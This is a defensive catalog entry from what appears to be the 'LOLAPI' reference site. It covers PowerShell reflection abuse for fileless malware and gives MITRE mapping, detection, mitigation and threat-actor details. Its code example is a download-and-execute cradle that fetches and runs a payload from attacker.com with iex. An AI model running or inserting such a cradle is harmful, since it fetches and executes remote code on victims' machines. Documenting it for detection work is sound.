LOLAPI
Back to API Browser

PowerShell - Reflection and .NET Abuse

⚠️ Critical Risk📁 Script Engine Api🏷️ code execution✅ Verified
#script-engine-api#reflection#fileless-malware

🔧 API Details

Namespace

PowerShell.exe

Language

PowerShell

Official Documentation

https://learn.microsoft.com/en-us/powershell/

📊 Risk Assessment

Severity

Critical

Prevalence

widespread

Ease of Abuse

easy

Likelihood in Real Attacks

95%

🎯 MITRE ATT&CK Techniques

T1027.011

Click to view on MITRE ATT&CK

Abuse Scenarios

Fileless malware via reflection

Technique: T1027.011

🚨 Common in Campaigns

Load .NET assemblies and invoke methods without writing to disk

Code Example:

[Reflection.Assembly]::LoadWithPartialName("System.Net"); $wc = New-Object Net.WebClient; iex $wc.DownloadString('http://attacker.com/payload')
Detection Difficulty: Hard

🔍 Detection Strategies

Microsoft Defender

MEDIUM Effectiveness

Monitor for suspicious PowerShell Reflection patterns

EDR

HIGH Effectiveness

Behavioral detection of reflection-based execution

🛡️ Mitigation Strategies

policy

HIGH Feasibility

Restrict PowerShell execution via WDAC/AppLocker

monitoring

MEDIUM Feasibility

Monitor PowerShell script block logging

🕵️ Threat Intelligence

👥 APT Groups / Threat Actors

APT29

APT28

FIN7

🦠 Malware Families

PowerShell Empire

Cobalt Strike

🔨 Tools

Empire

Cobalt Strike

PSExec

📋 Metadata

API ID

6dc5ff82-15f2-4fe7-b817-65ebe068c188

Created

2026-02-02

Author

Claw